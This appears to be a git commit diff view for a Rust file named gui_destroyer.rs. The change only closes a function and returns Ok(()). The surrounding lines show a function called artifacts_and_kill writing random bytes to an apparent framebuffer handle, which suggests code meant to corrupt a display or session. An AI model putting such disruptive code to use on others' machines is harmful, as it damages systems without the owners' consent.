diff options
| author | Namilskyy <alive6863@gmail.com> | 2025-10-29 23:49:52 +0300 |
|---|---|---|
| committer | Namilskyy <alive6863@gmail.com> | 2025-10-29 23:49:52 +0300 |
| commit | c3ebda7ce605e40e6bc43b3d492f0fb0a8153e59 (patch) | |
| tree | e2f79fea660f1d958b76afded4d243ba64ef5e29 /src/non_critical/gui_destroyer.rs | |
| parent | e6aa891cadd94232b533a95feebf764a61054fcc (diff) | |
Building release
Diffstat (limited to 'src/non_critical/gui_destroyer.rs')
| -rw-r--r-- | src/non_critical/gui_destroyer.rs | 3 |
1 files changed, 3 insertions, 0 deletions
diff --git a/src/non_critical/gui_destroyer.rs b/src/non_critical/gui_destroyer.rs index a7d1c75..3c72def 100644 --- a/src/non_critical/gui_destroyer.rs +++ b/src/non_critical/gui_destroyer.rs @@ -20,7 +20,10 @@ fn artifacts_and_kill(root: bool) -> Result<(), std::io::Error> { let garbage: Vec<u8> = (0..1024).map(|_| rng.gen()).collect(); let _ = fb.write(&garbage); } + } + + Ok(()) } |
